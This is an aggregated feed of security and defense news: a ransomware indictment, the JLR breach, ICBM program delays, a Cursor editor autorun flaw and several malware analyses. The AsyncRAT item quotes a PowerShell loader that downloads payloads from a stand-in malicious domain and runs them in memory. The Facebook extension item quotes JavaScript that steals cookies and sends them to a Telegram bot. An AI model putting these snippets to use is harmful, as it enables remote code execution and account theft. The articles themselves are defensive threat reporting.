• A recent bug bounty discovery has drawn attention to a browser-specific reflected Cross-Site Scripting (XSS) vulnerability on help-ads.target.com. This flaw was found to bypass Amazon CloudFront’s Web Application Firewall (WAF) protections but could only be exploited on the Safari browser. The finding highlights the importance of testing for diverse browser behaviors during security assessments. Discovery […]

    The post Reflected XSS Flaw Enables Attackers to Evade Amazon CloudFront Protection Using Safari appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The U.S. District Court for the Eastern District of New York has unsealed a superseding indictment against a Ukrainian national, charging him with his alleged role as an administrator in the LockerGoga, MegaCortex, and Nefilim ransomware operations.

    The schemes reportedly extorted over 250 companies in the United States and hundreds more across the globe, causing millions of dollars in damages.

    The defendant, Volodymyr Viktorovich Tymoshchuk, also known by aliases such as “deadforz,” “Boba,” “msfv,” and “farnetwork,” is facing multiple charges for his involvement in these widespread cyberattacks.

    “Volodymyr Tymoshchuk is charged for his role in ransomware schemes that extorted more than 250 companies across the United States and hundreds more around the world,” stated Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

    He added that the attacks sometimes led to the complete disruption of business operations until the victims could recover or restore their encrypted data.

    According to the indictment, between December 2018 and October 2021, Tymoshchuk and his co-conspirators deployed the LockerGoga, MegaCortex, and Nefilim ransomware variants to encrypt computer networks in the U.S., France, Germany, the Netherlands, Norway, and Switzerland.

    The attackers customized the ransomware for each victim, ensuring that the decryption key was unique. If a victim paid the ransom, they would receive a tool to unlock their files.

    “Tymoshchuk is a serial ransomware criminal who targeted blue-chip American companies, health care institutions, and large foreign industrial firms, and threatened to leak their sensitive data online if they refused to pay,” said U.S. Attorney Joseph Nocella Jr. for the Eastern District of New York.

    From July 2019 to June 2020, the group allegedly compromised the networks of hundreds of companies with LockerGoga and MegaCortex.

    However, law enforcement successfully thwarted many of these attacks by notifying victims before the ransomware could be fully deployed.

    Following the initial wave of attacks, Tymoshchuk is alleged to have become an administrator for the Nefilim ransomware from July 2020 to October 2021.

    He and other administrators provided the ransomware to affiliates, including co-defendant Artem Stryzhak, in exchange for a 20% cut of the ransom proceeds.

    Stryzhak was previously extradited from Spain and faces charges in the same district. The charges against Tymoshchuk include conspiracy to commit computer fraud, intentional damage to a protected computer, and transmitting threats to disclose confidential information.

    The investigation, led by the FBI, is part of a broader international effort involving authorities in France, the Czech Republic, Germany, Lithuania, Luxembourg, the Netherlands, Norway, Switzerland, and Ukraine, with support from Europol and Eurojust.

    In a significant blow to the ransomware groups, decryption keys for LockerGoga and MegaCortex were released to the public in September 2022 through the “No More Ransomware Project,” allowing victims to recover their data without paying a ransom.

    Concurrent with the indictment, the U.S. Department of State’s Transnational Organized Crime Rewards Program is offering a reward of up to $11 million for information leading to the arrest, conviction, or location of Tymoshchuk or his conspirators.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Authorities Arrested Admins Of “LockerGoga,” “MegaCortex,” And “Nefilim” Ransomware Gangs appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The effort to replace the Minuteman III has gone so badly that the Air Force is now considering operating the already-half-century-old ICBM until 2050, according to a new report from the Government Accountability Office.

    “The Air Force reported to Congress in 2021 that Minuteman III would reach the end of its service life in 2036. Now, facing delays to Sentinel, the Air Force is evaluating options to continue operating Minuteman III through 2050,” said the report, which was released Wednesday. “The Minuteman III Program Office concluded that operation of Minuteman III until 2050 is feasible.”

    Sentinel is the Air Force’s effort to replace the LGM-30G Minuteman III, first deployed in 1970. Last year, the Pentagon announced that the projected cost of the program had grown to $140.9 billion, some 81 percent more than estimated in 2020. Some of the increase is due to “staffing problems, delays with clearance processing, information technology infrastructure challenges, and supply chain disruptions,” as the Union of Concerned Scientists put it, writing off a 2023 GAO report. Another part is due to the 2020 decision to sole-source engine production. But the main reason, Air Force officials have said, was the service’s unworkable plan to reuse existing ground infrastructure, including silos, command centers, and communications networks. 

    The program was halted last year, but work resumed over the summer after Air Force officials approved interim plans to “restructure” the Sentinel program. But the delays have service officials reckoning with the need to keep today’s ICBMs flying even further past their planned retirement.

    “According to Global Strike Command officials, prior to the Sentinel delays announced in 2024, the Air Force was exploring courses of action to sustain Minuteman III operational test launches past 2030. With delays to Sentinel, the Air Force will need to flight test Minuteman III through 2045, according to Minuteman III program office officials,” the report said.

    The report also said the delays to the Sentinel program are exacerbating shortages among maintainers and missile-field security personnel.

    “While the Air Force has taken some actions to prepare operators, maintainers, and security forces for the transition, the Air Force has not developed a schedule for construction of a Sentinel test facility. The test facility is necessary early in the transition as part of a multistep process to revise policy and instructions that will be needed to prepare security forces for the transition and concurrent operation of Minuteman III and Sentinel,” it said.

    Finally, the report says, the Air Force isn’t planning well enough to head off additional cost and schedule overruns as problems occur.

    “Global Strike Command has developed planning documents for the transition but has not developed a risk management plan or other risk management tools consistent with leading project management practices. Sentinel delays present an opportunity to develop and integrate these risk management tools into transition planning to establish an organized, methodical framework for managing risk. Having a process in place to manage this megaproject’s myriad risks will be critically important to ensure decision makers have a full understanding of transition risks,” it says.

    The report also includes the Pentagon’s response: “The Department concurs with the report as written.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cyber defenders need AI tools to fend off a new generation of AI-powered attacks, the head of the National Geospatial-Intelligence Agency said Wednesday.

    “The concept of using AI to combat AI attack or something like that is very real to us. So this, again, is commanders’ business. You need to enable your [chief information security officer] with the tools that he or she needs in order to employ AI to properly handle AI-generated threats,” Vice Adm. Frank Whitworth said at the Billington Cybersecurity Summit Wednesday.

    Artificial intelligence has reshaped cyber, making it easier for hackers to manipulate data and craft more convincing fraud campaigns, like phishing emails used in ransomware attacks. 

    Whitworth spoke a day after Sean Cairncross, the White House’s new national cyber director, called for a “whole-of-nation” approach to ward off foreign-based cyberattacks. 

    “Engagement and increased involvement with the private sector is necessary for our success," Cairncross said Tuesday at the event. “I’m committed to marshalling a unified, whole-of-nation approach on this, working in lockstep with our allies who share our commitment to democratic values, privacy and liberty…Together, we’ll explore concepts of operation to enable our extremely capable private sector, from exposing malign actions to shifting adversaries’ risk calculus and bolstering resilience."

    The Pentagon has been incorporating AI, from administrative tasks to combat. The NGA has long used it to spot and predict threats; use of its signature Maven platform has doubled since January and quadrupled since March 2024. 

    But the agency is also using “good old-fashioned automation” to more quickly make the military’s maps. 

    “This year, we were able to produce 7,500 maps of the area involving Latin America and a little bit of Central America…that would have been 7.5 years of work, and we did it in 7.5 weeks,” Whitworth said. “Sometimes just good old-fashioned automation, better practices of using automation, it helps you achieve some of the speed, the velocity that we're looking for.”

    The military’s top officer also stressed the importance of using advanced tech to monitor and preempt modern threats.

    “There's always risk of unintended escalation, and that's what's so important about using advanced tech tools to understand the environment that we're operating in and to help leaders see and sense the risk that we're facing. And there's really no shortage of those risks right now,” said Gen. Dan Caine, chairman of the Joint Chiefs of Staff, who has an extensive background in irregular warfare and special operations, which can lean heavily on cutting-edge technologies. 

    “The fight is now centered in many ways around our ability to harvest all of the available information, put it into an appropriate data set, stack stuff on top of it—APIs and others—and end up with a single pane of glass that allows commanders at every echelon…to see that, those data bits at the time and place that we need to to be able to make smart tactical, operational and strategic decisions that will allow us to win and dominate on the battlefields of the future. And so AI is a big part of that,” Caine said. 

    The Pentagon recently awarded $200 million in AI contracts while the Army doubled down on its partnership with Palantir with a decade-long contract potentially worth $10 billion. The Pentagon has also curbed development of its primary AI platform, Advana, and slashed staff in its chief data and AI office with plans of a reorganization that promises to “accelerate Department-wide AI transformation” and make the Defense Department “an AI-first enterprise.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A remote code execution vulnerability has been discovered in the Cursor AI Code Editor, enabling a malicious code repository to run code on a user’s machine upon opening automatically.

    The research team at Oasis Security uncovered the flaw, which bypasses typical user consent prompts by exploiting a default configuration setting in the popular editor.

    According to Oasis Security, the core of the vulnerability lies in Cursor shipping with its “Workspace Trust” feature disabled by default. This security setting, present in VS Code, is designed to prevent untrusted code from executing automatically.

    With this feature off, an attacker can craft a malicious code repository containing a specially configured .vscode/tasks.json file. By setting the runOptions.runOn parameter to “folderOpen”, any commands within this task file will execute the moment a developer opens the project folder in Cursor.

    Cursor AI Code Editor RCE Vulnerability

    This transforms a seemingly harmless action into silent code execution within the user’s security context, without any warning or prompt for trust. An attacker can leverage this to steal sensitive information, modify local files, or establish a connection to a command-and-control server.

    This vulnerability poses a significant risk because developer machines are often treasure troves of high-privilege credentials. Compromising a developer’s laptop can give an attacker immediate access to cloud API keys, Personal Access Tokens (PATs), and active SaaS sessions.

    The danger extends beyond the individual machine; with an initial foothold, an attacker can pivot to connected CI/CD pipelines and cloud infrastructure.

    This lateral movement is especially concerning as it can lead to the compromise of non-human identities, such as service accounts, which often possess broad and powerful permissions across an organization’s environment. A single booby-trapped repository could initiate a widespread security incident.

    Cursor users running the default configuration are directly affected by this vulnerability. In contrast, standard Visual Studio Code users with Workspace Trust enabled are at a lower risk, as the feature blocks automatic task execution until the user explicitly grants trust to the project folder.

    In response to the disclosure, Cursor has stated that users can manually enable Workspace Trust and that updated security guidance will be published soon.

    Oasis Security has provided immediate hardening recommendations for development teams. Users should enable Workspace Trust in Cursor, require the startup prompt, and consider setting the task.allowAutomaticTasks preference to “off”.

    It is also advised to open all unknown repositories in a secure, isolated environment, such as a disposable container or virtual machine, to prevent potential execution.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Cursor AI Code Editor RCE Vulnerability Enables “autorun” of Malicious on your Machine appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The word Defense in the name of the government agency now dubbed the Department of War invited “bureaucratic mission creep”—or so argues a Washington Post editorial that points to the nineteen mentions of “climate” in the 2022 National Defense Strategy. The op-ed suggests that previous administrations made fighting climate change “the military’s job” at the expense of its traditional focus on deterring conflict and, when necessary, winning wars. Nothing could be further from the truth.

    Both of us worked on strategy and climate security matters in the Office of the Secretary of Defense, so we are well-positioned to articulate how and why the Department’s focus on climate change has grown over the years, across administrations of both parties. The simple fact is that climate change poses enormous challenges for the American military. If the Department does not continue adapting to climate-related threats, it will face extraordinary new costs, which it will pay in billions of dollars, in warfighting readiness, and, ultimately, in the lives of American service members.

    To illustrate, in 2018 and 2019, the Department sustained more than $10 billion in damages at Tyndall Air Force Base, Camp Lejeune, and Offutt Air Force Base as the result of climate-driven storms. In the 2018 National Defense Authorization Act, Congress required the Department to scrutinize the military’s vulnerabilities to wildfires, floods, hurricanes, and sea-level rise; the consequent report gave rise to new predictive tools to foresee and mitigate the effects of climate hazards on defense installations. 

    The 2022 NDS reflected this hard experience, as well as hard science: “Increasing temperatures, changing precipitation patterns, rising sea levels, and more frequent extreme weather conditions will affect basing and access while degrading readiness, installations, and capabilities.” To address these concerns, the NDS directed the Department to strengthen its “ability to withstand and recover quickly from climate events.” The climate and weather monitoring tools that the Department relies on are now being dismantled to score political points. That means more risk—for installations, for military platform performance, and for individual service members, many of whose readiness and wellbeing are already being compromised by the increase in “black flag days,” when temperatures are too hot to train. 

    Climate change also figures heavily in the NDS because the military is increasingly called upon to deal with it—by state and local authorities who need help responding to climate-driven disasters. The number of personnel days the National Guard dedicated to fighting wildfires increased from 14,000 in 2016 to 176,000 in 2021, and have since continued to rise. As we wrote in the NDS, climate change “will increase demands, including on the Joint Force, for disaster response and defense support of civil authorities.” These new requirements mean that our soldiers are not training for core national-security tasks like preparing for war or, as this administration has decided, picking up trash in our nation’s capital. And such requirements are likely to accelerate with the pending demise of the Federal Emergency Management Agency.

    Indeed, climate change is reshaping the very map of the world—“creating new corridors of strategic interaction, particularly in the Arctic region,” as the NDS put it. Melting sea ice is creating new possibilities for navigation and resource exploitation, which is leading to more Russian and Chinese military operations along the Alaskan coastline. To accomplish its homeland-defense mission, the Department must closely monitor both the changing geophysical context as well as the shifting geopolitical environment. 

    There are many additional reasons the Department should be thinking intently about the implications of climate change, but the last one we’ll mention is the likelihood that global warming will spur a massive increase in migration, which is ostensibly a primary concern of the Trump administration. Scholars have identified drought as a key causal factor in the Syrian civil war, which led millions to seek refuge in Europe. As the NDS stated, and experience has since validated, “Insecurity and instability related to climate change may tax governance capacity in some countries while heightening tensions between others, risking new armed conflicts and increasing demands for stabilization activities.”

    We agree with the Trump administration that fighting climate change should not be the primary focus of our national-security establishment. No credible defense strategist has ever argued that should be the case. However, all Americans should want our military to integrate consideration of climate change into its planning and operations so it can achieve its mandate of defending against threats to the American people. Failure to plan for operating conditions that are changing fundamentally would be a colossal strategic mistake. 

    The Department of Defense was increasingly prepared for all threats. The Department of War might prepare for a far narrower set. If so, we will all come to regret it.

    Dr. Josh Busby is a Professor at the University of Texas who served as a senior climate advisor within the Office of the Secretary of Defense from 2021-2023. His core responsibility was integrating the effects of climate change on the military, and how DoD might build resilience to them, into the 2022 NDS. 

    Greg Pollock is an Adjunct Professor at Georgetown University who served in a series of leadership positions in the Office of the Secretary of Defense from 2010-2025, most recently as the acting deputy assistant secretary of defense for the Arctic and Global Resilience. 

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Jaguar Land Rover (JLR) has confirmed that data was stolen during a major cyberattack that has crippled its global operations, bringing vehicle production to a standstill since early September.

    The luxury carmaker, a subsidiary of India’s Tata Motors, is now working with cybersecurity specialists to investigate the breach and restore its systems.

    The cyber incident, first disclosed on September 2, 2025, prompted JLR to shut down its IT systems as a precautionary measure, which severely disrupted its manufacturing and sales operations.

    The shutdown has halted production at its key UK facilities in Solihull, Halewood, and Wolverhampton, stopping the assembly of approximately 1,000 vehicles per day. The disruption extends globally, affecting factories in Slovakia and India, as well as dealer sales, vehicle handovers, and the ordering of parts.

    Initially, JLR stated there was no evidence that customer data had been compromised. However, in a statement released on September 10, the company revised its assessment, admitting that its ongoing investigation revealed “some data has been affected”.

    While JLR has not specified whether the compromised data belongs to customers, employees, or the company itself, it has notified the UK’s Information Commissioner’s Office (ICO) and other relevant regulators.

    A JLR spokesperson stated, “Since we became aware of the cyber incident, we have been working around the clock, alongside third-party cybersecurity specialists, to restart our global applications in a controlled and safe manner”.

    The company has assured that its “forensic investigation continues at pace” and that it will contact anyone whose data is found to be impacted.

    The attack has caused significant concern, with UK government officials reportedly worried about the economic fallout from the prolonged shutdown, which is expected to last for weeks.

    A hacking group known as “Scattered Lus$,” previously linked to attacks on other UK retailers, has reportedly claimed responsibility for the breach.

    JLR continues to manage the crisis, with the majority of its production workers being told not to return to work as the company assesses the situation daily. The carmaker has apologized for the ongoing disruption caused by the incident.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Jaguar Land Rover Confirms Hackers Stole Data in Ongoing Cyberattack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CyberVolk ransomware first emerged in May 2024, rapidly evolving into a sophisticated threat aimed at government agencies and critical infrastructure in countries perceived as hostile to Russian interests.

    Leveraging a dual-layer symmetric encryption process, this malware has inflicted significant operational disruptions on scientific institutions and public services across Japan, France, and the United Kingdom.

    The group behind the attacks communicates exclusively via Telegram, issuing demands of $20,000 in Bitcoin and warning that any attempt to recover encrypted files will result in data destruction.

    Initial infection typically occurs through targeted phishing campaigns or compromised administrative credentials, allowing the ransomware to execute under standard user privileges before relaunching with elevated rights.

    ASEC analysts identified that once administrative access is obtained, the malware systematically excludes system-critical directories and files by matching predefined path strings such as “Windows” and “Program Files”.

    CyberVolk execution flow (Source – ASEC)

    This exclusion ensures that essential system components remain intact, preventing unintended system crashes that could thwart ransom negotiations.

    ASEC researchers noted the malware’s unique double-encryption structure, combining AES-256 in GCM mode with ChaCha20-Poly1305 to secure each file.

    A 12-byte random nonce is generated for every encryption operation, but critically, this nonce is not preserved in the encrypted file’s metadata, rendering decryption virtually impossible without the original key.

    Once encryption concludes, CyberVolk creates a ransom note named READMENOW.txt in the affected directory, instructing victims on payment and decryption procedures.

    Generated ransom note (Source – ASEC)

    Despite its technical sophistication, CyberVolk ransomware exhibits a deliberate flaw in its decryption routine.

    When victims enter the supplied decryption key, the malware attempts to decrypt the ChaCha20-Poly1305 layer using an incorrect nonce, causing the process to fail even with a valid key.

    Camouflage decryption progress (Source – ASEC)

    This “camouflage decryption” tactic misleads victims into believing they can recover data through payment, while in reality, the absence of the original nonce makes recovery unfeasible.

    Infection Mechanism Deep Dive

    Upon execution, CyberVolk checks its privileges and, if necessary, triggers a privilege escalation routine to gain administrator rights.

    It then enumerates files across all local drives, filtering out paths containing substrings defined in an exclusion table.

    The core encryption routine reads each file into memory and invokes the Go-based crypto_aes_NewCipher function followed by crypto_cipher_NewGCM to perform AES-256 GCM encryption:-

    v15 = crypto_aes_NewCipher(keyPtr, 32, 32, 0, a5, ...)
    v76 = crypto_cipher_NewGCM(v15, 32, ..., a5, ...)
    nonce := make([]byte, v76.NonceSize())
    crypto_rand_Read(nonce, v76.NonceSize(), ...)
    ciphertext := v76.Seal(nil, nonce, fileData, nil)

    This ciphertext is subsequently wrapped with ChaCha20-Poly1305, producing a compact payload consisting solely of encrypted data and an authentication tag.

    By omitting the nonce in the stored payload, the developers guarantee that only they can perform valid decryption—though their own flawed implementation prevents even them from restoring files without manual nonce management.

    The tailored infection routine, combined with sophisticated encryption layers and deliberate recovery flaws, underscores CyberVolk’s intent to maximize operational impact and victim uncertainty.

    Organizations must implement off-site backups, restrict administrative access, and conduct regular recovery drills to mitigate such threats.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers have recently observed a surge in sophisticated fileless malware campaigns targeting enterprise environments.

    AsyncRAT, a powerful Remote Access Trojan, leverages legitimate system tools to execute malicious payloads entirely in memory, effectively sidestepping traditional disk-based defenses.

    Emergence of this threat underscores the evolving tactics employed by cyber adversaries to maintain stealth and persistence on compromised systems.

    Initial access in the majority of these attacks is achieved through compromised remote support software. Intruders exploit unauthorized ScreenConnect deployments, gaining interactive control over victim machines.

    Once inside, they deploy a multi-stage loader written in VBScript. LevelBlue analysts noted that this loader retrieves two encoded payloads—logs.ldk and logs.ldr—from attacker-controlled servers.

    These payloads are never written to disk; instead, they are reflected directly into memory, converting raw byte arrays into executable code at runtime.

    AsyncRAT’s architecture revolves around modular .NET assemblies designed for both evasion and core RAT functionality.

    LevelBlue researchers identified three principal classes within the first-stage DLL: an entry-point initializer, a persistence manager that creates scheduled tasks disguised as legitimate updaters, and an anti-analysis component that patches AMSI and ETW hooks to disable Windows security logging.

    Through dynamic API resolution and in-memory loading, the malware maximizes stealth and complicates forensic analysis.

    Beyond obfuscation, AsyncRAT’s second stage—AsyncClient.exe—serves as the command-and-control engine.

    Encrypted configuration data within the binary specifies C2 domains, ports, infection flags, and target directories.

    Upon decryption with AES-256, the client establishes a TCP socket to its control server, exchanging length-prefixed MessagePack packets.

    This protocol supports reconnaissance commands, data exfiltration routines, and remote execution of attacker-supplied instructions.

    Infection Mechanism

    AsyncRAT’s infection mechanism begins with the execution of a simple VBScript, Update.vbs, launched through WScript.exe.

    The script employs the following PowerShell snippet to fetch and execute the loader:

    $urls = @("http://malicious.domain/logs.ldk","http://malicious.domain/logs.ldr")
    foreach ($u in $urls) {
        $bytes = (New-Object Net.WebClient).DownloadData($u)
        [Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
    }

    This concise loader carries out two critical functions: it decrypts the downloaded binaries and invokes their entry points entirely in memory, leaving no forensic footprint on disk.

    By chaining reflection-based loading with anti-analysis routines in the Obfuscator.dll, the attacker ensures that each stage remains hidden from endpoint detection tools.

    Subsequent control is handed off to AsyncClient.exe, which maintains persistence and enables full remote administration of the host.

    Through this fileless approach, AsyncRAT demonstrates how modern malware can blend legitimate scripting platforms with advanced evasion tactics to compromise and control targeted systems seamlessly.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Malicious actors have launched a sophisticated malvertising campaign on Facebook that coerces unsuspecting users into installing a fake “Meta Verified” browser extension.

    Promoted through seemingly legitimate video tutorials, these ads promise to unlock the coveted blue verification tick without paying Meta’s subscription fee.

    In reality, the extension is engineered to harvest sensitive user data, including session cookies, access tokens, and IP addresses.

    By leveraging trusted platforms like Box.com for hosting, attackers ensure high availability and evade simple URL-blocking defenses, making the scam appear both authentic and risk-free.

    Upon closer inspection, the video tutorials accompanying the ads bear the fingerprints of Vietnamese-speaking threat actors, with narration and code comments written in Vietnamese.

    The extension’s code, although clumsily obfuscated and likely generated by an AI-assisted toolkit, still effectively exfiltrates data.

    Bitdefender analysts identified the use of the Facebook Graph API to query Business account information once valid access tokens are acquired, allowing attackers to distinguish high-value corporate profiles from personal accounts.

    Malicious browser extension ad (Source – Bitdefender)

    Victims who follow the tutorial unwittingly grant the extension permissions to read and export cookies from the facebook.com domain.

    Once installed, the extension immediately invokes an exportCookies function that compiles every cookie into a formatted string before transmitting it to a Telegram bot controlled by the attackers.

    Cookie export function (Source – Bitdefender)

    To further personalize the stolen data, the malware queries https://ipinfo.io/json to append geolocation details, bolstering its marketability on underground forums.

    Bitdefender researchers noted that variants of this extension include adjustable parameters for tick size and position, suggesting an automated pipeline for generating new campaign assets with minimal manual effort.

    The modular design also supports automatic execution upon Chrome startup, ensuring persistent data harvesting even if users disable and re-enable the extension.

    Infection Mechanism Deep Dive

    The core of the infection mechanism lies in the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens without triggering user prompts.

    After installation—triggered by clicking on an ad link—the extension uses chrome.cookies.getAll({ domain: "facebook.com" }, callback) to gather cookies.

    Within the callback, it constructs the payload:-

    async function exportCookies() {
      chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
        const cookieString = cookies. Map(c => `${c.name}=${c.value}`).join(";");
        const userId = cookies. Find(c => c.name === "c_user")?.value || "Unknown";
        const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
        const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
        sendToTelegram(payload);
      });
    }

    This streamlined approach bypasses many endpoint-based detections, while the use of legitimate domains for hosting and command-and-control reduces the likelihood of rapid takedown.

    Security teams should monitor abnormal cookie export activity and enforce rigorous extension vetting to defend against such industrialized malvertising threats.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶